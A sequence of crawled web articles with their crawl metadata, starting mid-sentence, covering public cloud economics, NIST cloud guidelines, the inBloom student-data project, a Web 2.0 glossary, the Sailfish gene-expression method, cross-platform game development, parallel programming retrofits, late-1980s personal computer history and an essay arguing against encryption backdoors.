re-created the time-sharing model and monetized their idle spare capacity. Smaller organizations valued cloud computing. It eliminated a barrier to entry for software development firms. Software start-ups once raised capital to purchase technology for development and test. With cloud, they could rent just the capacity they needed for the time they required. Larger firms could get additional capacity to deal with workload spikes, and then release that capacity when the demand lessened. Companies of all sizes rediscovered that most of their IT workload could run on a generic computational resource. They realized renting was cheaper than owning, especially when they considered the hassle factor. This appealing economic model deteriorates as the underlying price of technology drops. Would any venture capital firm fund a start-up that intended to deliver cloud computing? Today’s cloud computing providers rely on the sunk cost of their existing infrastructure. The initial capital expense is an insurmountable barrier to entry, as long as that cost remains high. The cost of computing continues to drop, eroding that barrier to entry. Today’s start-up can acquire multicore computing platforms for a few hundred dollars. A midsized company can acquire computing capacity at one-eighth to 1/64th the price charged five years ago. This represents the continuing impact of Moore’s Law, which lowers the unit cost of computing by half every nine, 12 or 18 months, compounded across a five-year horizon. (Network capacity tends to double at unit cost over nine months, disk storage over a year and processors at the longer end of the scale.) The Upside of the Hassle Factor Today’s public cloud provider will presumably continue to grow, but not exponentially. In five years, the cost of their marginal capacity will be miniscule compared to today’s prices. Public cloud consumers will realize the hassle factor associated with owning technology is trivial compared with the business risk of depending on someone else’s availability, security, recoverability, privacy, service levels and overall care of their Internet-connected generic technology. Companies will rediscover the benefits of having a captive IT supplier staffed by its own employees. When a public cloud fails, all it can give its customers is more capacity at a lower price, later. An executive has more choices when managing his or her own IT staff should they fail to deliver what the business needs. That’s the upside of the hassle factor. Is there any long-term viable strategy for a public cloud vendor? The first challenge would be to ride the price/performance improvements as rapidly as they arrive, so the business would have to continually invest in new IT—which is costly. Firms such as Google, Microsoft and Amazon, which have already invested heavily in IT, have developed brilliant innovations to contain costs. Modular design with minimal site preparation. Power and cooling added as needed. Standardized containers delivered and wired in on demand. Amazon also builds modular data centers to minimize construction costs and optimize heating, cooling, cable runs and energy consumption. These businesses strive relentlessly for margin performance through monetizing unused capacity—but the core business drives their IT procurement strategy. A public cloud vendor has no funding source to support that level of IT investment. If a public cloud vendor could identify a core set of long-term customers that guaranteed to spend at least some amount annually, that could anchor the public cloud vendor similarly to a large department store anchoring a shopping mall. All the existing public cloud vendors have such a customer—their parent company. But a customer of cloud who promises to spend a minimum amount annually, regardless of actual utilization, isn’t buying cloud computing—they’re outsourcing. The cost/benefit analysis between an external supplier and a captive supplier comes down to this: Can the business run its data center efficiently enough to compete with an outsourcer? The outsourcer has the same capital costs, software costs, personnel costs and also must make a profit. If a business is inefficient, cloud is only half the solution. The whole solution is either outsourcing or running the data center more efficiently. Public cloud vendors exploit the temporary difference between the decreasing cost of computing and the increasing demand. As that cost continues to drop, those businesses that need computing will find it increasingly affordable. More and more complex problems will be tractable with owned resources. The benefits of ownership will outweigh the apparent simplicity of public cloud. Cloud computing will continue—but as private and community cloud, not public cloud. For some companies, the great migration to public cloud will flow in reverse. For most companies, it will stop before it even begins. As the market dries up, the end game will evolve as W. Chan Kim and Renée Mauborgne describe in Blue Ocean Strategy. Expect to see frantic attempts at service differentiation and price wars as public cloud providers collapse into a “red ocean.” Note: This article follows the “NIST Definition of Cloud Computing” as defined in NIST SP 800-145, from http://csrc.nist.gov/publications/nistpubs/800-145/SP800-145.pdf. The key elements of this definition are on-demand, self-service, broad network access, resource pooling, rapid elasticity and measured service. Public cloud refers to cloud capabilities available to the general public.
<urn:uuid:7cb04dca-13d2-4df5-8162-a5aeaa9d31ae>
CC-MAIN-2017-09
http://enterprisesystemsmedia.com/article/the-fuzzy-economics-of-public-cloud
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00034-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947848
1,698
2.515625
3
The US government is setting out to address concerns about security in the cloud. The US National Institute of Standards and Technology has issued a draft document looking at issues such as privacy and security within cloud environments. The institute has also sought to tackle the uncertainty and confusion that surrounds the technology by introducing a document that sets out a series of definitions of cloud computing. The Guidelines on Security and Privacy in Public Cloud (registration required) examines some of the security issues facing cloud providers and customers and offers a series of recommendations for organisations to consider when outsourcing data, applications and infrastructure to a public cloud environment. The report, written by NIST computer scientists Tim Grance and Wayne Jansen, stressed the importance of building in security from the outset. "To maximise effectiveness and minimize costs, security and privacy must be considered from the initial planning stage at the start of the systems development life cycle. Attempting to address security after implementation and deployment is not only much more difficult and expensive, but also more risky." The report goes on to point out the importance of recognising that the cloud provider has little or no understanding of its customers' individual security requirements. "Organisations should require that any selected public cloud computing solution is configured, deployed, and managed to meet their security, privacy, and other requirements," warns the document. Other issues for customers include ensuring that client-side computing environment meets the organisation's security and privacy requirements for cloud computing and that the organisation retains accountability for its data and applications deployed in the cloud. The new cloud definition document,The NIST Definition of Cloud Computing, is NIST's contribution to the debate on cloud services. In its introduction, it points out that l"Cloud computing is still an evolving paradigm. Its definition, use cases, underlying technologies, issues, risks, and benefits will be refined and better understood with a spirited debate by the public and private sectors." The NIST is looking for public comments on the documents, which must be submitted by 28 February. This story, "Standards Body Sets Out Cloud Guidelines" was originally published by Techworld.com.
<urn:uuid:8eccf11f-3bbd-444e-9650-9e292d51211f>
CC-MAIN-2017-09
http://www.cio.com/article/2411436/security0/standards-body-sets-out-cloud-guidelines.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00454-ip-10-171-10-108.ec2.internal.warc.gz
en
0.946277
426
2.53125
3
Some school administrators are testing a bold idea to integrate the multitude of systems that are used to store student data, giving teachers a single view of how students are performing and allowing them to better deliver the right learning materials. The idea, which builds on a project called inBloom that's partly funded by Bill Gates, would also provide a single repository for the best learning applications and content, which teachers could draw from in a model akin to the app stores run by Apple and Google. It's just one way that schools are trying to put all their student databases, educational software and administrative systems under one roof as their use of educational technology grows. It has inevitably raised concerns about privacy and security, however. Some say the arrival of such a system would be long overdue. "This has always been where I wanted to be able to go," said Jim Peterson, technology director at Bloomington Public Schools in Illinois, who was on a panel discussing the idea Thursday at the education arm of the South by Southwest conference in Austin, Texas. The district has about 100 different systems in its data centers, for student assessments, attendance, food services, transportation ... "you name it," Peterson said. Bloomington embarked on an effort several years ago to integrate its data onto an easily accessible platform, but the effort failed because it was too big in scale, Peterson said. But now, as one district in nine states working together to pilot the inBloom project, its schools are in a better position to succeed, he said. InBloom, the brainchild of a nonprofit of the same name, is ultimately aimed at making learning more personalized for students through more efficient use of technology. In addition to the Bill & Melinda Gates Foundation, the Carnegie Corporation of New York is a major backer. The idea is that a better integrated technology and data analytics platform would provide a clearer picture of the student and make it easier to provide the right learning materials for that individual. The system could make teachers' jobs a lot easier too. Christine Sauca, a math teacher in Massachusetts' Everett school district, described her typical day in the classroom: She takes attendance, looks up grade-book information, checks five or six different content management systems, and logs into services from different vendors the district has contracts with, such as PBS. Finally, she gets to teach. When the day is over, she spends more time completing observational assessments and eventually makes lesson plans for the next day. Sauca logs into easily 10 or 15 different systems or pieces of software on any given day, she said. In the future, she's looking forward to a single sign-on model. "I'm going from paper systems to Word or Excel sheets to grade-book systems to state systems ... it's kind of all over the place," she said. But "the ability to go to one spot and do it all -- that is where I'm looking for all this to go," she said. Ken Wagner, associate commissioner of curriculum assessment and educational technology for the New York state education department, described inBloom as "boring plumbing stuff"; if it works right, teachers should need to pay attention to it. "What's interesting is the stuff built on top of it," he said. InBloom's roster of technology partners includes providers of learning tools like Agilix, Clever, Compass Learning and BloomBoard, as well as Amazon and Dell. Parent groups and privacy advocates have voiced concerns about the potential for data abuse or security breaches given all the information that inBloom would have access to. Panelists acknowledged those concerns, saying inBloom is working hard to provide answers to questions about privacy and security, and that the system is in compliance with state and federal regulations. Bill Gates himself delivered the closing keynote address at the South by Southwest education show, where he espoused the benefits of technology in education and said schools are at a "technology tipping point."
<urn:uuid:35b638a8-381c-482f-9003-d54f764c9124>
CC-MAIN-2017-09
http://www.itworld.com/article/2713379/networking-hardware/schools-test--app-store--for-learning-through-gates-funded-project.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00330-ip-10-171-10-108.ec2.internal.warc.gz
en
0.970739
795
2.5625
3
Flash: A program that lets users create animation for the Web. Blog: A portmanteau combining Web and log. It is a user- generated Web site on which entries often are journal-style and provide news or the writer's commentary on a topic. Blogosphere: The term that refers to the social network of all blogs on the Internet. Facebook: A social networking site that initially was limited to college students but was extended to the general public in September 2006. As of July, Facebook had 47 million users. Mashup: A Web site or application that combines content from more than one source into an integrated experience. MySpace: A general-interest, social-networking site. As of September 2007 it had more than 200 million global users. Podcast: A digital file that is distributed over the Internet via syndication feeds. It is designed for playback on MP3 players. Social Networks: Internet applications that help connect friends, business partners or other individuals using a variety of tools. Examples of online social networks are MySpace, Facebook, Friendster and LinkedIn. Virtual World: A computer-based simulated environment intended for its users to inhabit and interact via avatars. Web 2.0: Term coined by O'Reilly Media in 2004 used to describe the Internet applications that arose amid the ashes of the dot-com collapse. Particular focus has been given to user-created content, lightweight technology, service-based access and shared-revenue models. Wiki: A type of Web site that allows visitors to easily add, edit and remove content. The term wiki also can refer to the collaborative software itself. Sources: Gartner, O'Reilly Media, Wikipedia, TowerGroup
<urn:uuid:dd6ff14a-308f-45d2-bf25-8430e1c6f199>
CC-MAIN-2017-09
http://www.banktech.com/management-strategies/a-glossary-of-web-20-terms-for-banks/d/d-id/1291572
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00382-ip-10-171-10-108.ec2.internal.warc.gz
en
0.901753
354
2.6875
3
PITTSBURGH, Penn., April 21 — With gene expression analysis growing in importance for both basic researchers and medical practitioners, researchers at Carnegie Mellon University and the University of Maryland have developed a new computational method that dramatically speeds up estimates of gene activity from RNA sequencing (RNA-seq) data. With the new method, dubbed Sailfish after the famously speedy fish, estimates of gene expression that previously took many hours can be completed in a few minutes, with accuracy that equals or exceeds previous methods. The researchers’ report on their new method is being published online April 20 by the journal Nature Biotechnology. Gigantic repositories of RNA-seq data now exist, making it possible to re-analyze experiments in light of new discoveries. “But 15 hours a pop really starts to add up, particularly if you want to look at 100 experiments,” said Carl Kingsford, an associate professor in CMU’s Lane Center for Computational Biology. “With Sailfish, we can give researchers everything they got from previous methods, but faster.” Though an organism’s genetic makeup is static, the activity of individual genes varies greatly over time, making gene expression an important factor in understanding how organisms work and what occurs during disease processes. Gene activity can’t be measured directly, but can be inferred by monitoring RNA, the molecules that carry information from the genes for producing proteins and other cellular activities. RNA-seq is a leading method for producing these snapshots of gene expression; in genomic medicine, it has proven particularly useful in analyzing certain cancers. The RNA-seq process results in short sequences of RNA, called “reads.” In previous methods, the RNA molecules from which they originated could be identified and measured only by painstakingly mapping these reads to their original positions in the larger molecules. But Kingsford, working with Rob Patro, a post-doctoral researcher in the Lane Center, and Stephen M. Mount, an associate professor in Maryland’s Department of Cell Biology and Molecular Genetics and its Center for Bioinformatics and Computational Biology, found that the time-consuming mapping step could be eliminated. Instead, they found they could allocate parts of the reads to different types of RNA molecules, much as if each read acted as several votes for one molecule or another. Without the mapping step, Sailfish can complete its RNA analysis 20-30 times faster than previous methods. This numerical approach might not be as intuitive as a map to a biologist, but it makes perfect sense to a computer scientist, Kingsford said. Moreover, the Sailfish method is more robust — better able to tolerate errors in the reads or differences between individuals’ genomes. These errors can prevent some reads from being mapped, he explained, but the Sailfish method can make use of all the RNA read “votes,” which improves the method’s accuracy. The Sailfish code has been released and is available for download at http://www.cs.cmu.edu/~ckingsf/software/sailfish/. This work was supported in part by the National Science Foundation and the National Institutes of Health. About Carnegie Mellon University Carnegie Mellon (www.cmu.edu) is a private, internationally ranked research university with programs in areas ranging from science, technology and business, to public policy, the humanities and the arts. More than 12,000 students in the university’s seven schools and colleges benefit from a small student-to-faculty ratio and an education characterized by its focus on creating and implementing solutions for real problems, interdisciplinary collaboration and innovation. A global university, Carnegie Mellon has campuses in Pittsburgh, Pa., California’s Silicon Valley and Qatar, and programs in Africa, Asia, Australia, Europe and Mexico. Source: Carnegie Mellon University
<urn:uuid:c8bae234-4bb4-4e76-93c1-484b571e10f5>
CC-MAIN-2017-09
https://www.hpcwire.com/off-the-wire/computational-method-speeds-estimates-gene-expression/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00374-ip-10-171-10-108.ec2.internal.warc.gz
en
0.940197
786
2.875
3
The gaming industry has come a long way since its humble beginnings more than thirty years ago. From a time when people were thrilled to see a square white block and two rectangular paddles on the screen to today, where gamers explore realistic three-dimensional worlds in high resolution with surround sound, the experience of being a gamer has changed radically. The experience of being a game developer has changed even more. In the early 1980s, it was typical for a single programmer to work on a title for a few months, doing all the coding, drawing all the graphics, creating all the music and sound effects, and even doing the majority of the testing. Contrast this to today, where game development teams can have over a hundred full-time people, including not only dozens of programmers, artists and level designers, but equally large teams for quality assurance, support, and marketing. The next generation of consoles will only increase this trend. Game companies will have to hire more artists to generate more detailed content, add more programmers to optimize for more complex hardware, and even require larger budgets for promotion. What is this likely to mean for the industry? This article makes the following predictions: - The growing cost of development for games on next-gen platforms will increase demand from publishers to require new games to be deployed on many platforms. - Increased cross-platform development will mean less money for optimizing a new game for any particular platform. - As a result, with the exception of in-house titles developed by the console manufacturers themselves, none of the three major platforms (Xbox 360, PS3 and Nintendo Revolution) will end up with games that look significantly different from each other, nor will any platform show any real "edge" over the others. Many games will be written to a "lowest common denominator" platform, which would be two threads running on a single CPU core and utilizing only the GPU. All other market factors aside, the platform most likely to benefit from this situation is the Revolution, since it has the simplest architectural design. The PC, often thought to be a gaming platform on the decline, may also benefit. Conversely, the platforms that may be hurt the most by this are the PlayStation 3 and the XBox 360, as they may find it difficult to "stand out" against the competition. These are bold statements, and I don't expect it to make it without at least attempting to back it up with a more detailed argument, nor do I expect it to go unchallenged. In fact, I reserved a section at the end of the article where I describe all the problems I could find with my theory. So the fullness of my argument can best be understood by reading through to the conclusion and would encourage readers to do that prior to engaging in conversation in the discussion thread. I should also add that I fully expect all three next-generation platforms and also the gaming PC to survive and do reasonably well. The console wars will require at least another round after the next one before they have any sort of resolution. Ultimately, platforms themselves may reach a point where they no longer matter, as most content will be available on every gaming device. Our grandchildren may look at us strangely when we recall the intense and urgent battles between Atari and Intellivision, Nintendo and Sega, and Microsoft and Sony. At least we will have the satisfaction of knowing that we lived through the period when gaming went through some of its greatest advances.
<urn:uuid:22933430-3021-4aab-8963-341ce1d96a10>
CC-MAIN-2017-09
https://arstechnica.com/features/2005/11/crossplatform/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00426-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95921
697
2.53125
3
The most widely used computer programming languages today were not designed as parallel programming languages. But retrofitting existing programming languages for parallel programming is underway. We can compare and contrast retrofits by looking at four key features, five key qualities, and the various implementation approaches. In this article, I focus on the features and qualities, leaving the furious debates over best approaches (language vs. library vs. directives, and abstract and portable vs. low-level with lots of controls) for another day. Four features we need Features that any parallel programming solution, including retrofits, should include a defined memory model, synchronization, tasks, and data parallelism. Defining how changes in shared data are observable by different tasks had been an under-appreciated problem. Hans-J. Boehm wrote a report in 2004, titled Threads Cannot Be Implemented As a Library, which explains these issues. Having a well-defined ordering among accesses to distinct variables, and enabling the independence of updates to distinct variables, is so important that they have been addressed in Java, C11 and C++11. Without these retrofits, every parallel program sits on a crumbling foundation. The need for portable and efficient synchronization is substantial. Boost libraries, Intel’s Threading Building Blocks (TBB) and OpenMP offer solutions that are widely utilized. C++11 and C11 now offer support. Beyond these, the concept of transactions is a topic worth exploring in a future article. Synchronization retrofitting is helping portability. Substantial opportunities remain for helping efficiency. Tasks, not threads Programming should be an exercise in writing tasks that can run concurrently, without the programmer specifying the precise mapping of tasks onto hardware threads. An introduction to this challenge is The Problem with Threads by Edward A. Lee. Mapping should be the job of tools, including run-time schedulers, not explicit programming. This philosophy is being well supported by retrofits like OpenMP, TBB, Cilk Plus, Microsoft’s Parallel Patterns Library (PPL) and Apple’s Grand Central Dispatch (GCD). The need to assert some control over task to thread mapping to maximize performance is still present when using such systems today, but not always supported. Nevertheless, programming directly to native threads (e.g., pthreads) in applications is something that should be completely avoided. Retrofits are sufficient today to make tasks the method of choice. Data parallel support It should be reasonably straightforward to write a portable program that takes advantage of data parallel hardware. Ideally, data parallel support should be able to utilize vector and task parallel capabilities without a programmer having to explicitly code the division between the two. Unfortunately, no such solution is in wide spread use today even for vectorization alone. Effective auto-parallelization is very dependent on highly optimizing compilers. Compiler intrinsics lock code into a particular vector width (MMX=64, SSE=128, AVX=256, etc.). Elemental functions in CUDA, OpenCL, and Cilk Plus offer a glimpse into possible retrofits. Intel proposes we adopt the vectorization benefits of Fortran 90 array notations into C and C++ as part of the Cilk Plus project. Vector hardware is increasingly important in processors, GPUs and co-processors. OpenCL and OpenMP wrestle today with how to embrace data parallel hardware and how tightly tied programming will be to it. Microsoft C++ AMP has similar challenges when it comes to market with the next Microsoft Visual Studio. Standard, abstract, portable and effective solutions wanted! Five qualities we should desire Five key qualities that are desirable, for parallel programming, include composability, sequential reasoning, communication minimization, performance portability and safety. All of these qualities are unobtainable, in an absolute sense, whether as retrofits in an old language or with a clean slate and a new language. That is why we cannot call them features. The more of these qualities we obtain the better off we are. That makes them very important to keep in mind. Composability is a well-known concept in programming, offering rules for combining different things together (functions, objects, modules, etc.) so that it is easy to compose (think: combine in unanticipated ways). It is important to think of composability in terms of both correctness and performance. OpenCL, largely because it is less abstract, has low composability on both accounts. OpenMP and OpenCL have very serious performance composability unless they are used very carefully. New and abstract retrofits (TBB, Cilk, PPL, GCD) are much more tolerant and able to deliver high composability. Self-composability is an essential first step, but the ability to compose multiple retrofits together is essential in the long run as well. A welcome solution for tool vendors, Microsoft’s Concurrency Runtime has allowed retrofits from multiple vendors to coexist with increased composability. Parallel programming without the ability to mix and match freely, is undesirable and counterproductive. Composability deserves more attention than it gets. Sequential reasoning, the norm for reading a serial implementation, can apply with an appropriately expressed parallel program. OpenMP uses hints to create the use of parallelism instead of code changes. This allows the intent of a program to remain evident in the code. TBB and PPL emphasize relaxed sequential semantics to provide parallelism as an accelerator without making it mandatory for correctness. Writing a program in a sequentially consistent fashion is permitted and encouraged. An explicit goal of Cilk Plus is to offer sequential semantics to set it apart from other retrofits. The serial elision (or C elision) of a Cilk program is touted in papers from MIT. Programming that preserves sequential semantics has received praise as easier to learn and use. The elemental functions in OpenCL, CUDA and Cilk Plus have similar objectives. It is fair to say that programming in a manner that requires understanding parallel semantics, in order to understand intent, is both unpopular and out of vogue today. Such mandatory parallelism is harder to understand and to debug. Sequential reasoning can be extended to debuggers too. A hot area to watch here is debuggers working to present a debugging experience more akin to sequential experiences, with features like Rogue Wave’s replay capabilities in the Totalview debugger. Instead of sequential reasoning being a retrofit, it is more accurate to think of sequential reasoning as often being purposefully sought and preserved in a parallel world. Performance tuning on parallel systems often focuses on ensuring data is local when you use it and minimizing the need to move it around. Data motion means communication of some sort, and communication is generally expensive. Decisions in the design and implementation of retrofits, as well as the application programming itself, often impact performance dramatically. The task stealing algorithms of TBB, Cilk, PPL and GCD all have cache reuse strongly in mind in their designs. Retrofits to help, with communication minimization, are a tricky business and could use more attention. The goal here is that a tuned program on one piece of hardware performs reasonably well on another piece of hardware. It is desirable to be able to describe data and tasks in such a way that performance scales as parallelism increases (number of cores, or size of vectors, or cache size, etc.). Nothing is ever fully performance portable, but more abstract retrofits tend to hold up better. Unfortunately, implementations of abstractions can struggle to offer peak performance. It took years for compilers to offer performance for MMX or SSE that was competitive with assembly language programming. Use of cache-agnostic algorithms generally increase performance portability. Today, competing on performance with carefully-crafted CUDA and OpenCL code can be challenging because the coding is low level enough to encourage, or even require, the program structure to match the hardware. The lack of performance portability of such code is frequently shown, but effective alternatives remain works-in-progress. Language design, algorithm choices and programming style can affect performance portability a great deal. The freedom from deadlocks and race conditions, may be the most difficult to provide via a retrofit. No method to add complete safety to C or C++ has gained wide popularity. Safety has not been incorporated into non-managed languages easily, despite some valiant efforts to do so. To make a language safe, pointers have to be removed or severely restricted. Meanwhile, tools are maturing to help us cope with safety despite lack of direct language support, and safer coding style and safer retrofits appear to help as well. Perhaps safety comes via a combination of “good enough” and “we can cope using tools.” A journey ahead, together There are at least four key programming problems that any parallel programming solution should address, and five key qualities that can make a programming model, retrofit or otherwise, more desirable. Evolution in hardware will help as well. About the author James Reinders has helped develop supercomputers, microprocessors and software tools for 25 years. He is a senior engineer for Intel in Hillsboro Oregon.
<urn:uuid:88c01e68-ac24-45f9-8c83-a14920658764>
CC-MAIN-2017-09
https://www.hpcwire.com/2012/02/23/retrofitting_programming_languages_for_a_parallel_world/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00371-ip-10-171-10-108.ec2.internal.warc.gz
en
0.936193
1,880
2.875
3
The rise of the PC (1987-1990) In 1985, Bill Gates wrote an amazing memo to Apple management. In the memo, he praised the Macintosh for its innovative design, but noted that it had failed to become a standard, like the IBM PC was becoming. He correctly deduced that it was the advent of inexpensive, 100%-compatible clone computers that was propelling the PC ahead, and that any defects in the design of the computer would eventually be remedied by the combined force of the many companies selling PCs and PC add-on products, such as new graphics cards. He proposed a plan, which Microsoft would help bring to fruition, whereby Apple would license their operating system and hardware design to a number of other computer companies. Microsoft had been an early supporter and promoter of the Macintosh, but Gates feared that without compatible machines, it would fail to become a "second standard." Apple management ignored the memo, and decided to concentrate instead on making better computers themselves. The Macintosh II, introduced in 1987 for US$5,500, eschewed the original's all-in-one design in favor of a standard desktop chassis that supported add-in cards, and could be connected to a color monitor. Professional users loved it, although the price kept it out of the hands of most buyers. The Macintosh II. Users could add their own video cards using the NuBus Commodore finally introduced the more-powerful and -expandable Amiga 2000 (US$1495) and the cheaper Amiga 500 (US$595) with integrated keyboard, in 1987. The latter was expected to take over the Commodore 64's place as a cheap yet powerful home computer for the masses, and sales rose, peaking at over 1 million units in 1991. Top: Amiga 2000. Bottom: Amiga 500 Meanwhile, the Atari ST's momentum tailed off, with sales slowly declining as better games started coming out designed specifically for the Amiga 500. Atari did not release any new models of the ST except for a version with extra RAM preinstalled. Thanks to the inclusion of a MIDI port with every model, however, the ST became the computer of choice for digital musicians. But the real winner of this era was the IBM PC platform. Sales kept increasing, and by 1990 PCs and clone sales had more than tripled to over 16 million a year, leaving all of its competitors behind. The platform went from a 55 market share in 1986 to an 84% share in 1990. The Macintosh stabilized at about 6% market share and the Amiga and Atari ST at around 3% each. Bill Gates' predictions were coming true, as new, inexpensive graphics cards that cloned the new IBM VGA standard were starting to make the PC a credible game platform. In 1990, Origin released the first Wing Commander game. Its 256-color, scaled, and rotated bitmaps gave the illusion of 3D and made existing 2D space shooters on other computers, game consoles and arcades seem instantly outdated and quaint by comparison. 3D came to role playing games with Ultima Underworld in 1992 and fast-action first-person shooters with Wolfenstein 3D the same year. Now it was the PC that was setting the standard for new games, instead of the Amiga. Personal computer market share during the late 80s
<urn:uuid:86d8ba98-176e-48fb-81f3-6d51fcf592ba>
CC-MAIN-2017-09
https://arstechnica.com/features/2005/12/total-share/6/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00071-ip-10-171-10-108.ec2.internal.warc.gz
en
0.970675
675
3.21875
3
The devil is not in these details: Why encryption isn’t evil This feature first appeared in the Winter 2016 issue of Certification Magazine. Click here to get your own print or digital copy. Editor’s Note: This feature was written and published prior to the emergence of the current dispute between Apple and the FBI and therefore does not directly reference those proceedings. In the past few months, deadly terrorist attacks rocked San Bernardino, Calif., and shattered the French capital city of Paris. The technical investigation following both incidents largely focused on questions regarding digital communication and coordination among the attackers using standard encryption protocols to avoid eavesdropping by law enforcement and intelligence organizations. Encryption is already a hot-button topic in cybersecurity. These dramatic breaches of public safety have sparked a worldwide debate regarding the widespread use of encryption, and its role in barring government access to private communications. There’s one bottom line question: Is encryption a sinister tool being used serve nefarious ends? Politicians and presidential candidates were quick to condemn the attack, but also used their soapboxes to rail against encryption technology as a tool of terrorism. In a Democratic presidential debate, Hillary Clinton called for “a Manhattan-like project” focused on encryption. Republican presidential candidate John Kasich struck a similar tone in arguing that “we have to solve the encryption problem.” There’s certainly an undertone in the national conversation that encryption is an unwanted technology that facilitates terrorism — and that the government must take action to protect Americans from it. Kasich and Clinton are correct that there is an encryption “problem” but the problem is not that the technology is available. The real problem is that the technology is not well understood. Many average citizens are surprised to learn that encryption is a part of their everyday life and that the security it provides routinely protects their credit card information, healthcare records and other sensitive data from prying eyes. Encryption is not a problem to be solved: It is a technology to be embraced as a cornerstone of every organization’s information security program. The government itself relies heavily upon encryption technology and spends millions of dollars annually developing new encryption methods. How can government officials decry encryption as a terrorist weapon while simultaneously using it to protect sensitive information? What is encryption? Encryption is, quite simply, a set of mathematical formulas. In its most basic form, encryption algorithms take plaintext messages and use a secret key to transform them into an encrypted form that is unintelligible by anyone who does not have access to the corresponding decryption key. Encryption algorithms are public knowledge. Any university-level computer science student has the skills required to write a small piece of software that implements military-grade encryption technology in a matter of weeks. The government would have as much luck banning encryption as they would banning algebra or physics. What would you think if you learned that your neighbor was using advanced military-grade encryption algorithms to protect files stored on his smartphone or laptop computer? How about if he was using encrypted messaging technology to apply the Advanced Encryption Standard to text messages that he exchanged with others around the world? Does this sound sinister? It’s not. This description could not only easily fit your actual neighbor, but it most likely applies to you as well. Where is encryption used? If you have a laptop computer issued by your employer, it’s more likely than not that the entire hard drive is encrypted to protect the contents from prying eyes. Companies do this as a matter of routine to protect themselves in the event that the device is later lost or stolen. If a hard drive is encrypted, nobody can gain access to the files stored on the drive without having access to the corresponding decryption key, which is usually encoded with the laptop user’s password. Do you own an iPhone or Android smartphone? Both devices automatically encrypt all of the information stored on the device for similar reasons. Current versions of iOS and Android prevent anyone other than the phone’s owner from gaining access to the encrypted data. Even if Apple or Google wanted to cooperate with government investigators (or anyone else for that matter), they simply don’t have access to your sensitive information. They designed their operating systems this way on purpose. This level of security protects your data with strong encryption that prevents anyone from gaining unauthorized access. Isn’t that what you expect from your phone or tablet? Have you ever logged onto your bank account online, checked your email over the web or visited the White House website? If you’ve done any of these things, you’ve used the HTTPS protocol to communicate securely with the remote web server. HTTPS uses strong encryption to protect your data from prying eyes while in transit. Yes, that’s right — the White House website requires that citizens visiting its web site use strong encryption to browse the site. Go give it a try. If you type whitehouse.gov into your browser’s address bar, notice that it quickly changes to https:// whitehouse.gov. The “s” in “https” indicates that strong encryption is in use. How can government officials claim that the use of encryption is a problem when they force citizens to use it every day? What do politicians want? As with many political conversations, it’s difficult to understand exactly what politicians are calling for when they speak out against encryption technology. Hillary Clinton, when asked how she would address encryption, admitted that, despite viewing encryption as a danger, she doesn’t really know what could be done to neutralize it: “It doesn’t do anybody any good if terrorists can move toward encrypted communication that no law enforcement agency can break into before or after, there must be some way. I don’t know enough about the technology … to be able to say what it is.” FBI Director James Comey has been similarly confusing in his plea for action against encryption technology. In a 2014 speech, he warned listeners that, “Justice may be denied because of a locked phone or an encrypted hard drive.” He went on to say that “We aren’t seeking a backdoor approach. We want to use the front door, with clarity and transparency, and with clear guidance provided by law.” Unfortunately, Comey doesn’t provide any technical details on how his so-called “front door” would actually work. By the way, it’s not just the White House website that forces the use of encryption — citizens visiting Director Comey’s FBI.gov site are also forced to use encrypted communications. What’s wrong with these government requests? The bottom line is that the requests by government officials and political candidates simply aren’t feasible. When pressed for technical details on their plans to subvert (when necessary) or replace encryption technology, they merely assert that technical people can figure it out. What no one says openly is that such an approach is simply not feasible, practical, or even advisable. There is no direct means of providing government officials with access to encrypted communications without fundamentally weakening the technology itself. The National Security Agency tried to develop this type of backdoor back in 1993 when they proposed the Clipper Chip: an encryption device with a government backdoor. That device failed miserably when the technology industry refused to adopt it. Two of the congressmen who attended a hearing where Director Comey made his pitch for a government backdoor later sent him a letter explaining their objections to his proposal. Rep. Will Hurd, R-Texas, and Rep. Ted Lieu, D-Calif., have an interesting shared background — they are both not only congressmen, but also trained computer scientists. In their letter to Comey they wrote: Any vulnerability to encryption or security technology that can be accessed by law enforcement is one that can be exploited by bad actors, such as criminals, spies, and those engaged in economic espionage. It is important to remember that computer code and encryption algorithms are neutral and have no idea if they are being accessed by an FBI Agent, a terrorist, or a hacker. During our oversight hearing, it was clear that none of the witnesses were willing to assert that a backdoor would be completely air-tight and secure. Moreover, demanding special access also opens the door for other governments with fewer civil liberties protections to demand similar backdoors. The congressmen are correct. Encryption is an essential technology for safeguarding sensitive information. The fact that terrorists use encryption technology is not a reason to deprive American citizens and others the use of secure communications methods. The government must find other means to counter terrorist threats and provide security against terrorism without jeopardizing the security of our private information. Any technology in the wrong hands can be used to bring sinister designs to fruition. That doesn’t make the technology itself corrupt, or mean that no one should ever use it for anything. Fear of terror that prevents technological tools from serving the public good is only accomplishing the aims of terrorists. Encryption is not evil.
<urn:uuid:e9efaab0-f5ca-4253-b3d7-a025f950ce38>
CC-MAIN-2017-09
http://certmag.com/devil-not-in-these-details-why-encryption-isnt-evil/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00599-ip-10-171-10-108.ec2.internal.warc.gz
en
0.949497
1,850
2.625
3
